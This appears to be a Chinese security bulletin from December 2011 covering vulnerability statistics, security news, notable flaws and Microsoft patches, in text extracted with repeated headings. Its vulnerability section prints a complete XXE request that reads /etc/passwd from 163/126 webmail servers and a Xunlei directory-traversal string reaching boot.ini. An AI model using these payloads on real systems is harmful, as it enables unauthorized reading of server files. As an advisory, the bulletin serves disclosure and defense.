1、国盟信息安全通报(2011 年 12 月 15 日 第十一期) 2 2011 年年 12 月月 15 日日国盟信息安全通报(2011 年 12 月 15 日 第十一期) 3国盟信息安全通报国盟信息安全通报 (第第 11 期期) 国际信息安全学习联盟国际信息安全学习联盟 2011 年 12 月 15 日 根据中国国家信息安全漏洞库 (CNNVD) 的统计, 本期 (2011年 12 月 01 日至 2011 年 12 月 15 日)新增安全漏洞 130 个,与上个月平均增长数量相比,新增安全漏洞数量有所上升,包含14 项安全更新,共修复 25 个漏洞。好消息是 14 个安全公告中只有三个被列为“
2、高危”(Critical)级别;坏消息是,剩余 11 个仍然全部是“重要”(Important)级别。“重要”级别安全公告中提到的部分漏洞恐怕会对黑客非常具有吸引力。 国盟信息安全通报(2011 年 12 月 15 日 第十一期) 4主要内容主要内容一、概述 . 1一、概述 . 1二、安全漏洞增长数量及种类分布情况 . 1二、安全漏洞增长数量及种类分布情况 . 1漏洞严重程度分布图:(2011 年 12 月 01 日-2011 年 12 月 15 日) . 1漏洞产生的原因分布图(2011 年 12 月 01 日-2011 年 12 月 15 日) . 2漏洞引发的威胁分布图(2011 年 1
3、2 月 01 日-2011 年 12 月 15 日): . 2漏洞影响对象类型分布图: . 4三、三、安全产业动态 . 5安全产业动态 . 5运营商向美政府通报黑客攻击事件可免于起诉 . 5Java 漏洞成黑客目标 微软呼吁用户更新软件 . 6卡巴斯基宣布退出 BSA 以抗议 SOPA 法案 . 7赛门铁克:垃圾邮件发送量降低到三年最低点 目标攻击增多 . 7四、四、政府之声 . 8政府之声 . 8英国政府投资 10 亿美元提升网络安全 . 8维基解密正在研制新的网络提交平台. 9中国电科院首次牵头信息安全领域国家标准制定 . 10国资委强调:通信企业属于公益性国企 非竞争型国企 . 11五、
4、五、本期重要漏洞实例 . 12本期重要漏洞实例 . 12163 邮箱 126 邮箱任意文件下载漏洞及修复 . 12JBoss Enterprise SOA Platform 调用程序身份验证绕过漏洞 . 14JBoss Application Server 管理控制台跨站脚本执行漏洞 . 15迅雷网邻目录遍历任意文件下载漏洞. 16微软 2011 年 12 月安全补丁公告 . 17六、本期网络安全事件 . 22六、本期网络安全事件 . 22联合国服务器遭黑客袭击 百余电邮及密码被公开 . 22研究称 Skype 软件含安全威胁 可追踪个人隐私 . 23木马病毒下载器“Yalrevo.av”可增
5、肥逃避查杀. 24迅驰集团等金融公司财务系统受到黑客重创 . 24注:注:本报根据中国国家信息安全漏洞库(CNNVD)和各大信息安全网站整理分析而成。国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办一、概述 一、概述 国盟信息安全通报是根据中国国家信息安全漏洞库(CNNVD)统计,本周新增安全漏洞89 个,与前四周平均增长数量相比,新增安全漏洞数量有所下降,其中 WordPress 新增漏洞 6个。根据补丁信息统计,本周共有 63 个漏洞被修复,修补率为 70.79%,其中 1 个危急漏洞已被修补,危急漏洞修补率为100.00%。截至 2011年12月1
6、5日, CNNVD漏洞总量已达 49310个。 二、安全漏洞增长数量及种类分布情况 二、安全漏洞增长数量及种类分布情况 漏洞严重程度分布图:(漏洞严重程度分布图:(2011 年年 12 月月 01 日日-2011 年年 12 月月 15 日)日) 国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 漏洞产生的原因分布图(漏洞产生的原因分布图(2011 年年 12 月月 01 日日-2011 年年 12 月月 15 日)日) 漏洞引发的威胁分布图(漏洞引发的威胁分布图(2011 年年 12 月月 01 日日-2011 年年 12 月月 15 日):日): 国
7、盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 漏洞影响对象类型分布图:漏洞影响对象类型分布图: 国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办三、 安全产业动态 三、 安全产业动态 运营商向美政府通报黑客攻击事件可免于起诉运营商向美政府通报黑客攻击事件可免于起诉 北京时间 12 月 2 日消息,据国外媒体报道,美国众议院情报委员会(House IntelligenceCommittee)周四以 17 票赞成、1 票反对的投
8、票结果通过了一项旨在鼓励诸如 Verizon 通信和康卡斯特这样的电信和有线电视运营商主动与美国政府分享黑客攻击事件数据的法案。根据该法案的规定,如果能够主动“出于善意地”向美国监管机构通报有关黑客攻击其自身计算机系统或窃取用户个人数据等事件的信息, 那么运营商将会被免于民事或刑事起诉。 有线电视、 互联网和电信运营商们都普遍支持这项法案。 因为在基于自愿原则与美国监管机构分享信息的同时, 他们还有权监管机构处获得有关网络安全威胁的机密情报。 美国监管机构将对有权获得机密情报的企业进行资格审核。Verizon 通信负责处理与联邦政府关系的高级副总裁彼得戴维森(PeterDavidson)在今天
9、投票之前发表的一份声明中表示: “寻求合作和信息共享正在成为美国监管机构和运营商都愿意接受的做法。 此举能够有效防止包括通信网络在内的基础设施遭到严重网络攻击。 该法案能够有效提高美国事先识别和降低网络攻击威胁的能力。 ”隐私权利保护组织美国公民自由联盟(American Civil Liberties Union)对该法案进行了批评, 称该法案将规避目前的现有法律, 允许运营商向监管提供用户个人信息却无需面对来自消费者保护组织或公民权益组织的法律诉讼。国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 Java 漏洞成黑客目标漏洞成黑客目标 微软呼吁用户
10、更新软件微软呼吁用户更新软件 据国外媒体报道,微软信息安全团队发表最新一期信息安全研究显示,在最近一年内,微软的防毒软件总共侦测到2750万次瞄准 Java 漏洞的攻击,平均每季度 690 万次,超越先前 Adobe 在Acrobat、Reader 及 Flash 方面的漏洞,成为黑客主要目标。该份报告指出,从今年上半年开始,Java 执行环境(JRE)的虚拟机器(JVM)及开发工具 JDK成为攻击目标,原因在于 Java 非常普及,Oracle 宣称超过 3 亿台设备安装 Java。这些恶意软件大部分都攻击Java2010 年发现的一个 JRE 漏洞,去年第四季度开始有恶意软件攻击该漏洞,但
11、直到今年三月才修补,结果是今年第一季度增加了十倍的攻击。 微软呼吁 Java 及其他软件的用户必须更新软件,以 Java 为例,攻击次数居次的漏洞早在 2008 年 12 月就已经修补,其他主要被攻击的 Java 漏洞则在 2009 年 11 月就已经修补。部分专家更建议,非必要使用到 Java 技术的电脑就不应该安装 Java 软件。 除了 Java 之外,微软操作系统本身的漏洞也成为焦点,该份报告指出,今年第二季度因为WindowsShell漏洞, 针对操作系统的攻击从上一季度的200多万次增长至500多万次,仅次于 Java。 国盟信息安全通报(2011 年 12 月 15 日 第十一期
12、) 国盟信息安全研究小组主办 卡巴斯基宣布退出卡巴斯基宣布退出 BSA 以抗议以抗议 SOPA 法案法案停止网上盗版法(SOPA)引发公众争议和辩论,而在科技公司之间也出现了前所未有的观点裂痕, 卡巴斯基今天在提交给媒体的声明中表示, 他们不惜退出商业软件联盟 (BSA)也要反对法案的通过。卡巴斯基表示, 他们没有参与制订和讨论 SOPA 的行动,也不支持SOPA 法案被通过, 公司认为 SOPA 会对公众利益形成损伤, 由于 BSA 的大多成员都对此持支持态度, 因此卡巴斯基决定在 2012 年 1 月 1 日起停止在 BSA 的活动。 从目前的状况看,软件企业、唱片业、 电影公司是支持反盗
13、版法案通过的主要力量, 而搜索引擎、 ISP、DNS 供应商则极力反对, 因为这会给他们带来监管上的额外成本。 赛门铁克赛门铁克:垃圾邮件发送量降低到三年最低点垃圾邮件发送量降低到三年最低点 目标攻击增多目标攻击增多 赛门铁克今天发布安全报告显示, 全球各地垃圾邮件的数量接近三年来的最低点, 目前占所有发送的邮件数量的 70.5,听起来似乎还是很多,但和往年比已经明显状况变好。其中俄罗斯是情况最恶劣的地区,76.7%的垃圾邮件率名列榜首,而沙特阿拉伯则为 76.6%,美国 69.9%,加拿大 69.5%。夹带恶意软件的电子邮件约 0.39%,也即每255.8 封电子邮件就有一封夹带恶意软件。英
14、国比例最高,平均 149.4 封就有一封。这些夹带恶意软件的信件中,40.2%含有恶意网站的连结,比上个月激增 20.1% 。但是令人震惊的是,针对用户的目标攻击却愈演愈烈,安全厂商每日要封杀将近 5000个包含恶意软件的网站, 攻击者通常想尽办法渗透试图获取个人或者机构中的各种信息, 以化学、制药产业、政府、公共部门、制造业和金融业为主要目标。平均这些企业每天要被攻击 1120 多次。国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办四、 政府之声 四、 政府之声 英国政府投资英国政府投资 10 亿美元提升网络安全亿美元提升网络安全 为应对日益严峻的互联
15、网安全问题,英国政府将推出总额 6.5 亿英镑(超过 10 亿美元)的“网络安全战略”(CyberSecurityStrategy),用 4 年时间提升该国的网络安全水平。 科技进步和网络犯罪的发展速度总是超过法律的发展速度, 这也加大了网络犯罪分子的追踪和处罚难度。为应对这一趋势,英国国家犯罪局(NationalCrimeAgency)将在 2013 年前成立新的网络犯罪小组,并与大都会警察局的中央电子犯罪小组和英国严重有组织犯罪局(SeriousOrganizedCrimeAgency)展开合作。 英国内阁大臣麦浩德(FrancisMaude)说: “我们去年发布的国家安全战略已经将网络安
16、全与国际恐怖主义、 国际军事危机和自然灾害共同列为首要任务之一。 我们的主要目标是让英国成为全球最安全的商业基地。 ” 英国内阁的目标是,到2015 年,让多数英国公民都能够享受到基本的安全保护,对抗网络威胁。 麦浩德表示, 英国目前有6%的 GDP 由互联网驱动,这一比例还将继续增长。但如果无法创造更为安全的互联网商业环境,这一趋势就将受到威胁。尤其值得注意的是,包括盗版在内的网络犯罪每年都会给英国经济带来数十亿美元的损失。国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 维基解密正在研制新的网络提交平台维基解密正在研制新的网络提交平台 据国外媒体报道
17、, 维基解密网站上周发布了一份研究报告, 揭露了全球监控产品的交易情况。据该网站的创始人朱利安阿桑奇(Julian Assange)称,这些监控产品的泛滥将会进一步威胁到人们的隐私安全。该网站还宣称正在研制新的网络提交平台。阿桑奇说,这项研究涉及到了 25 个国家的 160 家公司,是该泄密网站出于对消息人士的安全负责而采取的措施之一。 由于担心安全问题, 维基解密网站已有一年多没有通过网络来接收消息人士提供的情报了。 在这项调查中,总共收集了 287 份文件。阿桑奇称,这些文件揭示了“全球监控行业的实际情况” 。维基解密称这些文件为“间谍文件” ,并表示它们显示了西方国家是如何向专制国家销售
18、这些先进监控工具的。“你们谁拥有 iPhone?你们谁拥有黑莓手机?你们谁在使用 Gmail?好吧,你们都上当受骗了。 ”在伦敦的新闻发布会上阿桑奇对与会者说, “实际的情况是,情报合同商们正在向全世界各个国家销售所有这些产品的监控系统。 ”维基解密称,这些信息的编辑得到了其他媒体和新闻相关组织的帮助,包括德国的电视台ARD、英国的新闻调查局(TheBureauofInvestigativeJournalism) 、 印度的 印度徒报(TheHindu) 、意大利的快报(Espresso) 、法国的媒体 OWNI和美国的华盛顿邮报 (TheWashingtonPost) 。维基解密发布的文件包
19、括与秘密监控产品开发商相关的宣传册、目录、使用手册、报告和其他文档。 例如, 来自 NetQuest 公司的一份文档, 就是在 10 月美国华盛顿举行的 ISSWorldAmericas 大会上的一份报告。阿桑奇称,维基解密仍在研制新一代网络提交系统。他反复强调,维基解密很担心 SSL(安全套接层)协议,因为该协议能够让使用电脑的人相互交换加密信息。阿桑奇表示,SSL已变得不再安全。他断言,情报机构已侵入了证书授权机构(Certificate Authorities,简称CA) 。CA 机构为 SSL 发布数字证书。有几百个中间 CA 机构能发布与根 CA 机构相关的 SSL 证书。目前,几个
20、中间 CA 机构已报告有黑客入侵。这些黑客获得了谷歌等主流网站的数字证书,因而能够轻易地拦截这些网站的通讯信息。 阿桑奇并没有透露维基解密将会何时再恢复网络提交系统。 该组织已开发了 “离线组件” ,他说。 “在当前,我们通过多种途径来接受消息人士的情报。 ”阿桑奇说。国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 中国电科院首次牵头信息安全领域国家标准制定中国电科院首次牵头信息安全领域国家标准制定 12 月 9 日消息,近日中国电科院接到全国信息安全标准化技术委员会通知,委托中国电科院牵头承担 2011 年信息安全国家标准项目计划中的安全可控信息系统
21、(电力系统)安全指标体系 国家标准制定工作, 这是中国电科院首次牵头承担信息安全领域国家标准制定。 安全可控信息系统是国家重要信息基础设施, 研究并制定其安全指标体系, 对指导和评价我国重要行业信息系统安全防护具有重要意义。本标准将依据国家和相 关行业信息安全法规、制度和规范性文件,面向安全可控信息系统明确安全指标体系的层次结构、表现要素及相互关联关系,提出安全技术指标和安全管理指标。 中国电科院将严格按照国家标准制定流程和要求, 在全国信息安全标准化技术委员会的指导下, 与联合承担单位紧密协作, 完成标准制定任务, 为我国信息保障工作提供技术支撑。近年来, 中国电科院积极参与国际和国家信息安
22、全标准制定工作。 在信息安全国家标准项目方面,参与了四项国家标准的制定工作,分别是无线网络访问控制 技术规范 , 引入可信第三方的实体鉴别及接入架构规范 ,信息技术 安全技术 实体鉴别 第 3 部分 采用数字签名技术的机制 第 1 号修改单: 三元对等鉴别 及 工控 SCADA 系统安全控制指南 。在信息安全国际标准项目方面,参加了 ISO/IEC JTC1/SC27 关于信息安全管理体系国际标准的制定工作,目前已正式向全国信息安全标准化技术委员会递交电力信息安全管理指南国际标准提案申请,并通过了全国信息安 全标准化技术委员会的专家论证。国盟信息安全通报(2011 年 12 月 15 日 第十
23、一期) 国盟信息安全研究小组主办 国资委强调:通信企业属于公益性国企国资委强调:通信企业属于公益性国企 非竞争型国企非竞争型国企 12 月 10 日,国资委副主任邵宁表示,未来的调整会将国企划分为公益型国企和竞争型国企。通信服务属于公益性质的国企,可以不承担破产退出风险,社会效益高于经济效益。这一表态的时机极为敏感。腾讯财经讯 12 月 10 日消息,国资委副主任邵宁今日阐述了国资委对于两类国有企业的改革路线图,其中,以中粮、宝钢等为代表的国有竞争型大企业将通过整体上市,最终实现规范的公众公司体制模式。而对于中石油等公益性质的国有企业,邵宁称将加强改革与监管,并未提及整体上市。值得注意的是,1
24、1 月 6 日,中石油宣布组建集团董事会,原集团公司总经理蒋洁敏将出任董事长。据21 世纪经济报道报道,一位央企高层称,随着董事会的组建,中石油将开始由国有独资向股份化转变,不排除在未来合适的时候,实现集团整体上市。而在此之前,中石化和中海油也均已完成集团层面的董事会建设。 不过,在今日的中国企业领袖年会上,国资委副主任邵宁阐述了两种不同类型的国企的不同改革路线, 指出国资委将积极推进竞争型国有企业的整体上市, 而石化行业则被归类为公益型国有企业。 邵宁表示,中国目前的国有企业分为两种类型:具有公益性质的国有企业;竞争领域的国有大企业。前者包括石油、石化、电网、通信服务等领域的企业,在经营中存
25、在着不同程度的垄断因素,有些是寡头竞争,有些是独家经营,但企业自身没有定价权,要求社会效益高于经济效益。而后者包括包括宝钢、中粮、一汽、中国建材等,在机制上更加市场化 ,国有出资人对其没有扶持帮助义务,企业独立承担经济法律责任以及市场竞争乃至破产退出的风险。 对于国有企业下一步的改革方向,邵宁表示,国有竞争型大企业,路线便是通过整体上市最终成为公众公司, 彻底变为混合所有制股份公司, 完全按照资本市场的要求和规则运作。而三大油企所属的公益性质的国企,方向则是“加强四方面的改革与监管”,其中并没有整体上市这一项。 这四方面的改革包括企业内部治理机制改革、 建立区别于竞争性国有企业的考核评价制度、
26、 实施有效的行业监管以避免企业损害社会公众利益、 形成政府间政策安排以帮助企业实现社会和经济效益的双重目标。 邵宁强调,国有企业改革是一个世界性的难题,中国的改革进行到目前的深度、取得目前的效果“非常不容易”。他表示,在当前已经达到的改革深度上,改革进一步深化的前景已经“非常清晰”,即上述两种类型企业的不同改革方向。国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办五、 本期重要漏洞实例 五、 本期重要漏洞实例 163 邮箱邮箱 126 邮箱任意文件下载漏洞及修复邮箱任意文件下载漏洞及修复 发布日期:20111210更新日期:20111215受影响系统:1
27、26 、163 邮箱安全级别:描述: 简要描述:163 邮箱和 126 邮箱在实现上存在缺陷,利用 80sec 发布的 xml 解析漏洞可以读取服务器上任意文件,包括服务器配置文件和敏感的数据库文件,结合上下文逻辑可能可以获得更高权限。 详细说明:163 的服务器在接受和传递参数时使用的是 xml 的格式进行数据传递,但是根据 80sec 的安全公告,如果服务端在处理 xml 数据时格式不对就会导致安全漏洞,使用应用上下文的权限来获取任意文件内容,结合逻辑可能可以得到更多的权限 漏洞证明:神奇的代码哦,就是简单的在 xml 头部附加我们的恶意就可以了 POST /js4/s?sid=jAZNl
28、aKzhPcBsFgYIazzsbDOwpsMYtTh&func=mbox:compose&l=compose&action=deliver HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: text/javascript Referer: http:/ Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET4.0C;
29、 .NET4.0E) Host: Content-Length: 1348 Connection: Keep-Alive 国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办Cache-Control: no-cache Cookie: its a secert var=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C%21DOCTYPE+copyright+%5B%3C%21ENTITY+hi80sec+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cobject%3E%
30、3Cstring+name%3D%22id%22%3Ec%3A1320845207002%3C%2Fstring%3E%3Cobject+name%3D%22attrs%22%3E%3Cstring+name%3D%22account%22%3E%22Hi%22%26lt%3Bfukhaha%26gt%3B%3C%2Fstring%3E%3Cboolean+name%3D%22showOneRcpt%22%3Efalse%3C%2Fboolean%3E%3Carray+name%3D%22to%22%3E%3Cstring%3E%22fukhaha%22%26lt%3Bfukhaha%26gt
31、%3B%3C%2Fstring%3E%3C%2Farray%3E%3Carray+name%3D%22cc%22%2F%3E%3Carray+name%3D%22bcc%22%2F%3E%3Cstring+name%3D%22subject%22%3Eshow+me+the+%2Fetc%2Fpasswd%3C%2Fstring%3E%3Cboolean+name%3D%22isHtml%22%3Etrue%3C%2Fboolean%3E%3Cstring+name%3D%22content%22%3E%26lt%3Bdiv+style%3D%27line-height%3A1.7%3Bcol
32、or%3A%23000000%3Bfont-size%3A14px%3Bfont-family%3Aarial%27%26gt%3B%26lt%3BDIV%26gt%3B%26hi80sec%3B%26lt%3B%2FDIV%26gt%3B%26lt%3B%2Fdiv%26gt%3B%3C%2Fstring%3E%3Cint+name%3D%22priority%22%3E3%3C%2Fint%3E%3Cboolean+name%3D%22saveSentCopy%22%3Etrue%3C%2Fboolean%3E%3Cboolean+name%3D%22requestReadReceipt%
33、22%3Efalse%3C%2Fboolean%3E%3Cstring+name%3D%22charset%22%3EGBK%3C%2Fstring%3E%3C%2Fobject%3E%3Cboolean+name%3D%22returnInfo%22%3Efalse%3C%2Fboolean%3E%3Cstring+name%3D%22action%22%3Edeliver%3C%2Fstring%3E%3Cint+name%3D%22saveSentLimit%22%3E1%3C%2Fint%3E%3C%2Fobject%3E 修复方案:修改服务端 xml 解析器 禁用外部实体 国盟信息安
34、全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 JBoss Enterprise SOA Platform 调用程序身份验证绕过漏洞调用程序身份验证绕过漏洞 发布日期:20111117更新日期:20111213受影响系统:RedHatJBossEAP5.x安全级别:描述:BUGTRAQ ID:50720CVEID:CVE20114085JBoss 企业应用平台 (JBossEnterpriseApplicationPlatform, EAP) 是 J2EE 应用的中间件平台。JBossEnterpriseApplicationPlatform 在调用程序的实现上
35、存在安全漏洞,攻击者可利用此漏洞绕过身份验证机制,非法访问受影响应用程序。建议:厂商补丁:RedHat目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http:/www.jboss.org/国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 JBoss Application Server 管理控制台跨站脚本执行漏洞管理控制台跨站脚本执行漏洞 发布日期:20111202更新日期:20111205受影响系统:JBossGroupJBossApplicationServer7.x安全级别:描述:BUGTRAQ ID:50885CVEID:CV
36、E20113606Jboss 是非常流行的开源 J2EE 应用服务器。Jboss 管理控制台允许用户通过 HTTP 请求执行某些操作, 但无需进行验证, 这样可导致执行某些非法操作。建议:厂商补丁:JBossGroup目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http:/www.jboss.org/国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 迅雷网邻目录遍历任意文件下载漏洞迅雷网邻目录遍历任意文件下载漏洞 发布日期:20111129更新日期:20111130受影响系统:XunLei 迅雷网邻安全级别:描述:迅雷网邻,即以前的
37、“迅雷邻居” ,是迅雷网络开发的提供下载服务客户端软件迅雷 7.2 里应用市场的一款小软件,用于嗅探局域网内(或者附近)真实邻居,实现资源快速下载。具有精确定位、智能搜索、动态提醒等功能。迅雷网邻在实现上存在目录遍历漏洞, 远程攻击者可利用此漏洞下载对方未共享的任意文件。 测试方法:警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!XLN:/ykz20090321XPO#00225F4F5066FLTQ/TDDOWNLOAD/RBD316/././././././c:boot.ini建议:厂商补丁:XunLei目前厂商还没有提供补丁或者升级程序, 我们建议使用此软件
38、的用户随时关注厂商的主页以获取最新版本:http:/ 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办 微软微软 2011 年年 12 月安全补丁公告月安全补丁公告 公告 ID 公告标题和摘要 最高严重等级和漏洞影响 重新启动要求 受影响的软件 公告 ID 公告标题和摘要 最高严重等级和漏洞影响 重新启动要求 受影响的软件 MS11-087 Windows 内核模式驱动程序中的漏洞可能允许远程执行代码内核模式驱动程序中的漏洞可能允许远程执行代码 (2639417) 此安全更新可解决 Microsoft Windows 中一个公开披露的漏洞。如果用户打开特制文档或者访问嵌入了 Tru
39、eType 字体文件的恶意网页,此漏洞可能允许远程执行代码。 严重 远程执行代码 需要重启动 Microsoft WindowsMS11-090 ActiveX Kill Bit 的 累 积 性 安 全 更 新的 累 积 性 安 全 更 新 (2618451) 此安全更新可解决 Microsoft 软件中一个秘密报告的漏洞。如果用户在 Internet Explorer 中查看使用特定二进制行为的特制网页,则此漏洞可能允许远程执行代码。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要 小 。 此 更 新 也 包 括 用 于 四 个 第 三 方 ActiveX 控件
40、的 kill bit。 严重 远程执行代码 可能要求重新启动 Microsoft WindowsMS11-092 Windows Media 中的漏洞可能允许远程执行代码中的漏洞可能允许远程执行代码 (2648048) 此安全更新可解决 Windows Media Player 和 Windows Media Center 中一个秘密报告的漏洞。如果用户打开特制的 Microsoft Digital Video Recording (.dvr-ms) 文件,此漏洞可能允许远程执行代码。不管怎样,不能强制用户打开文件;攻击要想成功,必须诱使用户这样做。 严重 远程执行代码 可能要求重新启动 Mi
41、crosoft Windows国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办MS11-088 Microsoft Office IME(中文)中的漏洞可能允许特权提升(中文)中的漏洞可能允许特权提升 (2652016) 此安全更新解决了 Microsoft Office IME (中文)中一个秘密报告的漏洞。如果登录用户在安装了微软拼音 (MSPY) 简体中文输入法编辑器 (IME) 受影响版本的系统上执行特定操作,则该漏洞可能会允许特权提升。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完
42、全管理权限的新帐户。仅 Microsoft Pinyin IME 2010 的实施受此漏洞影响。简体中文 IME 的其他版本和其他 IME 实施不受影响。 重要 特权提升 可能要求重新启动 Microsoft Office MS11-089 Microsoft Office 中的漏洞可能允许远程执行代码中的漏洞可能允许远程执行代码 (2590602) 此安全更新解决了 Microsoft Office 中一个秘密报告的漏洞。如果用户打开特制的 Word 文件, 该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管
43、理用户权限的用户受到的影响要小。 重要 远程执行代码 可能要求重新启动 Microsoft Office MS11-091 Microsoft Publisher 中的漏洞可能允许远程执行代码中的漏洞可能允许远程执行代码 (2607702) 此安全更新可解决 Microsoft Office 中一个公开披露的漏洞和三个秘密报告的漏洞。如果用户打开特制的 Publisher 文件,最严重的漏洞可能允许远程执行代码。成功利用这些漏洞的攻击者可以完全控制受影响的系统。攻击者可随后安装程序;查看、更改或重要 远程执行代码 可能要求重新启动 Microsoft Office 国盟信息安全通报(2011
44、年 12 月 15 日 第十一期) 国盟信息安全研究小组主办删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 MS11-093 OLE 中的漏洞可能允许远程执行代码中的漏洞可能允许远程执行代码 (2624667) 此 安 全 更 新 解 决 了 Windows XP 和 Windows Server 2003 所有受支持的版本中一个秘密报告的漏洞。对于 Windows XP 和 Windows Server 2003 的所有受支持版本,此安全更新的等级为“重要”。Windows Vista、 Windows Serv
45、er 2008、 Windows 7 和 Windows Server 2008 R2 不受此漏洞影响。 如果用户打开包含特制 OLE 对象的文件,则该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 重要 远程执行代码 可能要求重新启动 Microsoft WindowsMS11-094 Microsoft PowerPoint 中的漏洞可能允许远程执行代码中的漏洞可能允许远程执行代码 (2639142) 此安全更新解决 Microsoft Office 中两个秘密报告的漏洞。
46、如果用户打开特制的 PowerPoint 文件, 这些漏洞可能允许远程执行代码。成功利用其中任何一个漏洞的攻击者可以完全控制受影响的系统。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 重要 远程执行代码 可能要求重新启动 Microsoft Office 095 Active Directory 中的漏洞可能允许远程中的漏洞可能允许远程重要 可能要求重新Microsoft Windows国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办执行代码执行代码 (2640045) 此安全更新解决 Active Director
47、y、Active Directory 应 用 程 序 模 式 (ADAM) 和 Active Directory 轻型目录服务 (AD LDS) 中一个秘密报告的漏洞。如果攻击者登录到 Active Directory 域并运行特制应用程序,此漏洞可能允许远程执行代码。要利用此漏洞,攻击者首先需要获得凭据以登录到 Active Directory 域。 远程执行代码 启动 MS11-096 Microsoft Excel 中的漏洞可能允许远程执行代码中的漏洞可能允许远程执行代码 (2640241) 此安全更新解决了 Microsoft Office 中一个秘密报告的漏洞。如果用户打开特制的 E
48、xcel 文件,该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。安装和配置 Office 文件验证 (OFV) 可防止打开可疑的文件,从而阻止利用 CVE-2011-3403 中所述的漏洞的攻击媒介。 重要 远程执行代码 可能要求重新启动 Microsoft Office MS11-097 Windows 客户端客户端/服务器运行时子系统中的漏洞可能允许特权提升服务器运行时子系统中的漏洞可能允许特权提升 (2620712) 此安全更新解决了 Microsoft Windows
49、中一个秘密报告的漏洞。如果攻击者登录受影响的系统,并运行设计为将设备事件消息发送到较高完整性进程的特制应用程序,该漏洞可能允许特权提升。攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。重要 特权提升 需要重启动 Microsoft Windows国盟信息安全通报(2011 年 12 月 15 日 第十一期) 国盟信息安全研究小组主办MS11-098 Windows 内核中的漏洞可能允许特权提升内核中的漏洞可能允许特权提升 (2633171) 此安全更新解决了 Microsoft Windows 中一个秘密报告的漏洞。如果攻击者登录受影响的系统并运行旨在利用该漏洞的特制应用程序,该漏洞可能允许特权提升。攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。匿名用户无法利用此漏洞,也无法以远程方式利用此漏洞。 重要 特权提升 需要重启动 Microsoft WindowsMS11-099 Internet Explorer 的 累 积 性 安 全 更 新的 累 积 性 安 全 更 新 (2618444 ) 此安全更新解决 Internet Explorer 中的 3 个秘密报告的漏洞。如果用户打开与特制动态链接库 (DLL) 文件位于同一目录下的合法超文本标记语言 (HTML) 文件,最严重的漏洞可能允许远程执行代码。 重要 远程执行代码 需要重启动 Microsof
